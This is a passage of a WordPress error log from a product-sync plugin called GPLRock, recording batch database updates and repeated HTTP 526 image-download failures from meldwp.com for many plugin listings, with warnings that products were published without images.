17:54:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gravity-forms-autocomplete-address-field-10461.webp for product gravity-forms-autocomplete-address-field after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:54:33 UTC] GPLRock: Image download failed for product gravity-forms-autocomplete-address-field (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:35 UTC] GPLRock: Image download failed for product gravity-forms-autocomplete-address-field (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gravity-forms-autocomplete-address-field-10461.webp for product gravity-forms-autocomplete-address-field after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:54:37 UTC] GPLRock WARNING: Image download failed for product gravity-forms-autocomplete-address-field. URL: https://meldwp.com/wp-content/uploads/gravity-forms-autocomplete-address-field-10461.webp [08-Mar-2026 17:54:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gravity-forms-autocomplete-address-field [08-Mar-2026 17:54:37 UTC] GPLRock: Image download failed for product wordpress-popups-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:39 UTC] GPLRock: Image download failed for product wordpress-popups-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-popups-plugin-10001.webp for product wordpress-popups-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:54:41 UTC] GPLRock: Image download failed for product wordpress-popups-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:43 UTC] GPLRock: Image download failed for product wordpress-popups-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-popups-plugin-10001.webp for product wordpress-popups-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:54:45 UTC] GPLRock WARNING: Image download failed for product wordpress-popups-plugin. URL: https://meldwp.com/wp-content/uploads/wordpress-popups-plugin-10001.webp [08-Mar-2026 17:54:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-popups-plugin [08-Mar-2026 17:54:46 UTC] GPLRock: Image download failed for product stunning-3d-off-canvas-menu-wordpress-plugin-3d-menu-awesome (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:48 UTC] GPLRock: Image download failed for product stunning-3d-off-canvas-menu-wordpress-plugin-3d-menu-awesome (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stunning-3d-off-canvas-menu-wordpress-plugin---3d-menu-awesome-8668.webp for product stunning-3d-off-canvas-menu-wordpress-plugin-3d-menu-awesome after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:54:50 UTC] GPLRock: Image download failed for product stunning-3d-off-canvas-menu-wordpress-plugin-3d-menu-awesome (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:52 UTC] GPLRock: Image download failed for product stunning-3d-off-canvas-menu-wordpress-plugin-3d-menu-awesome (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:54:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stunning-3d-off-canvas-menu-wordpress-plugin---3d-menu-awesome-8668.webp for product stunning-3d-off-canvas-menu-wordpress-plugin-3d-menu-awesome after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:54:54 UTC] GPLRock WARNING: Image download failed for product stunning-3d-off-canvas-menu-wordpress-plugin-3d-menu-awesome. URL: https://meldwp.com/wp-content/uploads/stunning-3d-off-canvas-menu-wordpress-plugin---3d-menu-awesome-8668.webp [08-Mar-2026 17:54:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: stunning-3d-off-canvas-menu-wordpress-plugin-3d-menu-awesome [08-Mar-2026 17:54:54 UTC] GPLRock API Sync: Batch başlıyor - Offset: 0, Total: 0/9737 [08-Mar-2026 17:54:55 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:54:56 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 17:54:56 UTC] GPLRock API Sync: Batch başlıyor - Offset: 100, Total: 0/9737 [08-Mar-2026 17:54:57 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:54:57 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 17:54:57 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [08-Mar-2026 17:54:57 UTC] GPLRock API Sync: Batch başlıyor - Offset: 200, Total: 0/9737 [08-Mar-2026 17:54:58 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:54:58 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 17:55:13 UTC] GPLRock: Image download failed for product real-physical-media-physical-media-folders-seo-rewrites-in-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:55:14 UTC] GPLRock API Sync: Batch başlıyor - Offset: 500, Total: 0/9737 [08-Mar-2026 17:55:15 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:55:15 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 17:55:15 UTC] GPLRock: Image download failed for product real-physical-media-physical-media-folders-seo-rewrites-in-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:55:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/real-physical-media-physical-media-folders--seo-rewrites-in-wordpress-21277.webp for product real-physical-media-physical-media-folders-seo-rewrites-in-wordpress after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:55:18 UTC] GPLRock: Image download failed for product real-physical-media-physical-media-folders-seo-rewrites-in-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:55:20 UTC] GPLRock: Image download failed for product real-physical-media-physical-media-folders-seo-rewrites-in-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:55:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/real-physical-media-physical-media-folders--seo-rewrites-in-wordpress-21277.webp for product real-physical-media-physical-media-folders-seo-rewrites-in-wordpress after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:55:22 UTC] GPLRock WARNING: Image download failed for product real-physical-media-physical-media-folders-seo-rewrites-in-wordpress. URL: https://meldwp.com/wp-content/uploads/real-physical-media-physical-media-folders--seo-rewrites-in-wordpress-21277.webp [08-Mar-2026 17:55:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: real-physical-media-physical-media-folders-seo-rewrites-in-wordpress [08-Mar-2026 17:55:23 UTC] GPLRock: Image download failed for product ari-fancy-lightbox-wordpress-popup-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:55:25 UTC] GPLRock: Image download failed for product ari-fancy-lightbox-wordpress-popup-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:55:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ari-fancy-lightbox---wordpress-popup-plugin-33571.webp for product ari-fancy-lightbox-wordpress-popup-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:55:27 UTC] GPLRock: Image download failed for product ari-fancy-lightbox-wordpress-popup-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:55:29 UTC] GPLRock: Image download failed for product ari-fancy-lightbox-wordpress-popup-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:55:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ari-fancy-lightbox---wordpress-popup-plugin-33571.webp for product ari-fancy-lightbox-wordpress-popup-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:55:31 UTC] GPLRock WARNING: Image download failed for product ari-fancy-lightbox-wordpress-popup-plugin. URL: https://meldwp.com/wp-content/uploads/ari-fancy-lightbox---wordpress-popup-plugin-33571.webp [08-Mar-2026 17:55:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ari-fancy-lightbox-wordpress-popup-plugin [08-Mar-2026 17:55:31 UTC] GPLRock: Image download failed for product woocommerce-pos-complimentary-goods (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:55:34 UTC] GPLRock: Image download failed for product woocommerce-pos-complimentary-goods (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:55:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-pos-complimentary-goods-27148.webp for product woocommerce-pos-complimentary-goods after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:55:36 UTC] GPLRock: Image download failed for product woocommerce-pos-complimentary-goods (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:55:38 UTC] GPLRock: Image download failed for product woocommerce-pos-complimentary-goods (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:55:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-pos-complimentary-goods-27148.webp for product woocommerce-pos-complimentary-goods after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:55:40 UTC] GPLRock WARNING: Image download failed for product woocommerce-pos-complimentary-goods. URL: https://meldwp.com/wp-content/uploads/woocommerce-pos-complimentary-goods-27148.webp [08-Mar-2026 17:55:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-pos-complimentary-goods [08-Mar-2026 17:55:41 UTC] GPLRock: Image download failed for product zuper-shoutcast-and-icecast-radio-player-with-history-elementor-widget-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:55:41 UTC] GPLRock API Sync: Batch başlıyor - Offset: 800, Total: 100/9737 [08-Mar-2026 17:55:41 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:55:42 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 17:55:43 UTC] GPLRock: Image download failed for product zuper-shoutcast-and-icecast-radio-player-with-history-elementor-widget-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:55:43 UTC] GPLRock API Sync: Batch başlıyor - Offset: 900, Total: 200/9737 [08-Mar-2026 17:55:44 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:55:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zuper---shoutcast-and-icecast-radio-player-with-history---elementor-widget-addon-4638.webp for product zuper-shoutcast-and-icecast-radio-player-with-history-elementor-widget-addon after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:55:45 UTC] GPLRock: Image download failed for product zuper-shoutcast-and-icecast-radio-player-with-history-elementor-widget-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:55:45 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 100, Update: 0, Skip: 0, Toplam: 100 [08-Mar-2026 17:55:47 UTC] GPLRock: Image download failed for product zuper-shoutcast-and-icecast-radio-player-with-history-elementor-widget-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:55:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zuper---shoutcast-and-icecast-radio-player-with-history---elementor-widget-addon-4638.webp for product zuper-shoutcast-and-icecast-radio-player-with-history-elementor-widget-addon after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:55:49 UTC] GPLRock WARNING: Image download failed for product zuper-shoutcast-and-icecast-radio-player-with-history-elementor-widget-addon. URL: https://meldwp.com/wp-content/uploads/zuper---shoutcast-and-icecast-radio-player-with-history---elementor-widget-addon-4638.webp [08-Mar-2026 17:55:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zuper-shoutcast-and-icecast-radio-player-with-history-elementor-widget-addon [08-Mar-2026 17:55:49 UTC] GPLRock: Image download failed for product marketplatz-listings-marketplace-classifieds-portal (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:55:51 UTC] GPLRock: Image download failed for product marketplatz-listings-marketplace-classifieds-portal (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:55:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/marketplatz---listings-marketplace--classifieds-portal-22159.webp for product marketplatz-listings-marketplace-classifieds-portal after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:55:53 UTC] GPLRock: Image download failed for product marketplatz-listings-marketplace-classifieds-portal (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:55:55 UTC] GPLRock: Image download failed for product marketplatz-listings-marketplace-classifieds-portal (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:55:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/marketplatz---listings-marketplace--classifieds-portal-22159.webp for product marketplatz-listings-marketplace-classifieds-portal after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:55:58 UTC] GPLRock WARNING: Image download failed for product marketplatz-listings-marketplace-classifieds-portal. URL: https://meldwp.com/wp-content/uploads/marketplatz---listings-marketplace--classifieds-portal-22159.webp [08-Mar-2026 17:55:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: marketplatz-listings-marketplace-classifieds-portal [08-Mar-2026 17:55:58 UTC] GPLRock: Image download failed for product gallery-studio-wordpress-image-video-gallery (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:00 UTC] GPLRock: Image download failed for product gallery-studio-wordpress-image-video-gallery (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gallery-studio--wordpress-image--video-gallery-30831.webp for product gallery-studio-wordpress-image-video-gallery after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:56:02 UTC] GPLRock: Image download failed for product gallery-studio-wordpress-image-video-gallery (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:04 UTC] GPLRock: Image download failed for product gallery-studio-wordpress-image-video-gallery (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gallery-studio--wordpress-image--video-gallery-30831.webp for product gallery-studio-wordpress-image-video-gallery after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:56:06 UTC] GPLRock WARNING: Image download failed for product gallery-studio-wordpress-image-video-gallery. URL: https://meldwp.com/wp-content/uploads/gallery-studio--wordpress-image--video-gallery-30831.webp [08-Mar-2026 17:56:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gallery-studio-wordpress-image-video-gallery [08-Mar-2026 17:56:07 UTC] GPLRock: Image download failed for product adflex-multi-user-full-featured-ads-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:09 UTC] GPLRock: Image download failed for product adflex-multi-user-full-featured-ads-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/adflex---multi-user-full-featured-ads-system-16888.webp for product adflex-multi-user-full-featured-ads-system after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:56:11 UTC] GPLRock: Image download failed for product adflex-multi-user-full-featured-ads-system (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:13 UTC] GPLRock: Image download failed for product adflex-multi-user-full-featured-ads-system (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/adflex---multi-user-full-featured-ads-system-16888.webp for product adflex-multi-user-full-featured-ads-system after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:56:15 UTC] GPLRock WARNING: Image download failed for product adflex-multi-user-full-featured-ads-system. URL: https://meldwp.com/wp-content/uploads/adflex---multi-user-full-featured-ads-system-16888.webp [08-Mar-2026 17:56:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: adflex-multi-user-full-featured-ads-system [08-Mar-2026 17:56:15 UTC] GPLRock: Image download failed for product gravity-forms-iban-validation (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:18 UTC] GPLRock: Image download failed for product gravity-forms-iban-validation (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gravity-forms-iban-validation-21001.webp for product gravity-forms-iban-validation after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:56:20 UTC] GPLRock: Image download failed for product gravity-forms-iban-validation (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:22 UTC] GPLRock: Image download failed for product gravity-forms-iban-validation (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gravity-forms-iban-validation-21001.webp for product gravity-forms-iban-validation after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:56:24 UTC] GPLRock WARNING: Image download failed for product gravity-forms-iban-validation. URL: https://meldwp.com/wp-content/uploads/gravity-forms-iban-validation-21001.webp [08-Mar-2026 17:56:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gravity-forms-iban-validation [08-Mar-2026 17:56:24 UTC] GPLRock: Image download failed for product woopagination-wordpress-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:26 UTC] GPLRock: Image download failed for product woopagination-wordpress-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woopagination---wordpress--woocommerce-plugin-18755.webp for product woopagination-wordpress-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:56:28 UTC] GPLRock: Image download failed for product woopagination-wordpress-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:30 UTC] GPLRock: Image download failed for product woopagination-wordpress-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woopagination---wordpress--woocommerce-plugin-18755.webp for product woopagination-wordpress-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:56:32 UTC] GPLRock WARNING: Image download failed for product woopagination-wordpress-woocommerce-plugin. URL: https://meldwp.com/wp-content/uploads/woopagination---wordpress--woocommerce-plugin-18755.webp [08-Mar-2026 17:56:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woopagination-wordpress-woocommerce-plugin [08-Mar-2026 17:56:33 UTC] GPLRock: Image download failed for product woocommerce-banner-images-add-banners-to-products-categories-posts (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:35 UTC] GPLRock: Image download failed for product woocommerce-banner-images-add-banners-to-products-categories-posts (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-banner-images--add-banners-to-products-categories--posts-23415.webp for product woocommerce-banner-images-add-banners-to-products-categories-posts after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:56:37 UTC] GPLRock: Image download failed for product woocommerce-banner-images-add-banners-to-products-categories-posts (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:39 UTC] GPLRock: Image download failed for product woocommerce-banner-images-add-banners-to-products-categories-posts (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-banner-images--add-banners-to-products-categories--posts-23415.webp for product woocommerce-banner-images-add-banners-to-products-categories-posts after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:56:41 UTC] GPLRock WARNING: Image download failed for product woocommerce-banner-images-add-banners-to-products-categories-posts. URL: https://meldwp.com/wp-content/uploads/woocommerce-banner-images--add-banners-to-products-categories--posts-23415.webp [08-Mar-2026 17:56:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-banner-images-add-banners-to-products-categories-posts [08-Mar-2026 17:56:41 UTC] GPLRock API Sync: Batch başlıyor - Offset: 500, Total: 0/9737 [08-Mar-2026 17:56:42 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:56:42 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 17:56:43 UTC] GPLRock Auto Sync Cron: API sync batch çalıştırılıyor [08-Mar-2026 17:56:43 UTC] GPLRock API Sync: Batch zaten çalışıyor, skip [08-Mar-2026 17:56:44 UTC] GPLRock: Image download failed for product royal-audio-player (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:45 UTC] GPLRock API Sync: Batch başlıyor - Offset: 600, Total: 0/9737 [08-Mar-2026 17:56:46 UTC] GPLRock: 100 ürün kaydediliyor - 1 batch [08-Mar-2026 17:56:46 UTC] GPLRock: Image download failed for product royal-audio-player (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:46 UTC] GPLRock: DB kaydetme tamamlandı - Yeni: 0, Update: 100, Skip: 0, Toplam: 100 [08-Mar-2026 17:56:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/royal-audio-player-29875.webp for product royal-audio-player after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:56:48 UTC] GPLRock: Image download failed for product royal-audio-player (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:50 UTC] GPLRock: Image download failed for product royal-audio-player (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/royal-audio-player-29875.webp for product royal-audio-player after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:56:53 UTC] GPLRock WARNING: Image download failed for product royal-audio-player. URL: https://meldwp.com/wp-content/uploads/royal-audio-player-29875.webp [08-Mar-2026 17:56:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: royal-audio-player [08-Mar-2026 17:56:53 UTC] GPLRock: Image download failed for product pro-grid-ajax-post-custom-post-display-filter (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:55 UTC] GPLRock: Image download failed for product pro-grid-ajax-post-custom-post-display-filter (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pro-grid--ajax-post-custom-post-display--filter-23223.webp for product pro-grid-ajax-post-custom-post-display-filter after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:56:57 UTC] GPLRock: Image download failed for product pro-grid-ajax-post-custom-post-display-filter (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:56:59 UTC] GPLRock: Image download failed for product pro-grid-ajax-post-custom-post-display-filter (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pro-grid--ajax-post-custom-post-display--filter-23223.webp for product pro-grid-ajax-post-custom-post-display-filter after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:57:02 UTC] GPLRock WARNING: Image download failed for product pro-grid-ajax-post-custom-post-display-filter. URL: https://meldwp.com/wp-content/uploads/pro-grid--ajax-post-custom-post-display--filter-23223.webp [08-Mar-2026 17:57:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pro-grid-ajax-post-custom-post-display-filter [08-Mar-2026 17:57:02 UTC] GPLRock: Image download failed for product teamber-team-member-collection-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:04 UTC] GPLRock: Image download failed for product teamber-team-member-collection-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/teamber--team-member-collection-for-elementor-11817.webp for product teamber-team-member-collection-for-elementor after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:57:06 UTC] GPLRock: Image download failed for product teamber-team-member-collection-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:08 UTC] GPLRock: Image download failed for product teamber-team-member-collection-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/teamber--team-member-collection-for-elementor-11817.webp for product teamber-team-member-collection-for-elementor after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:57:11 UTC] GPLRock WARNING: Image download failed for product teamber-team-member-collection-for-elementor. URL: https://meldwp.com/wp-content/uploads/teamber--team-member-collection-for-elementor-11817.webp [08-Mar-2026 17:57:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: teamber-team-member-collection-for-elementor [08-Mar-2026 17:57:12 UTC] GPLRock: Image download failed for product woocommerce-drag-drop-uploader-ajax-file-upload (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:14 UTC] GPLRock: Image download failed for product woocommerce-drag-drop-uploader-ajax-file-upload (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-drag--drop-uploader--ajax-file-upload-28438.webp for product woocommerce-drag-drop-uploader-ajax-file-upload after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:57:16 UTC] GPLRock: Image download failed for product woocommerce-drag-drop-uploader-ajax-file-upload (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:18 UTC] GPLRock: Image download failed for product woocommerce-drag-drop-uploader-ajax-file-upload (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-drag--drop-uploader--ajax-file-upload-28438.webp for product woocommerce-drag-drop-uploader-ajax-file-upload after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:57:20 UTC] GPLRock WARNING: Image download failed for product woocommerce-drag-drop-uploader-ajax-file-upload. URL: https://meldwp.com/wp-content/uploads/woocommerce-drag--drop-uploader--ajax-file-upload-28438.webp [08-Mar-2026 17:57:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-drag-drop-uploader-ajax-file-upload [08-Mar-2026 17:57:20 UTC] GPLRock: Image download failed for product contact-lenses-prescription-plugin-woocommerce-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:22 UTC] GPLRock: Image download failed for product contact-lenses-prescription-plugin-woocommerce-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/contact-lenses-prescription-plugin--woocommerce-wordpress-16932.webp for product contact-lenses-prescription-plugin-woocommerce-wordpress after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:57:24 UTC] GPLRock: Image download failed for product contact-lenses-prescription-plugin-woocommerce-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:26 UTC] GPLRock: Image download failed for product contact-lenses-prescription-plugin-woocommerce-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [08-Mar-2026 17:57:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/contact-lenses-prescription-plugin--woocommerce-wordpress-16932.webp for product contact-lenses-prescription-plugin-woocommerce-wordpress after 3 attempts. HTTP Code: 526, Error: [08-Mar-2026 17:57:29 UTC] GPLRock WARNING: Image download failed for product contact-lenses-prescription-plugin-woocommerce-wordpress. URL: https://meldwp.com/wp-content/uploads/contact-lenses-prescription-plugin--woocommerce-wordpress-16932.webp [08-Mar-2026 17:57:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: contact-lenses-prescription-plugin-woocommerce-wordpress [08-Mar-2026 17:57:29 UTC] GPLRock: Image downloaded successfully for product pdfmentor-pro-wordpress-pdf-generator-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9d3e790c.webp [08-Mar-2026 17:57:29 UTC] GPLRock: Using pre-downloaded image for product pdfmentor-pro-wordpress-pdf-generator-for-elementor: 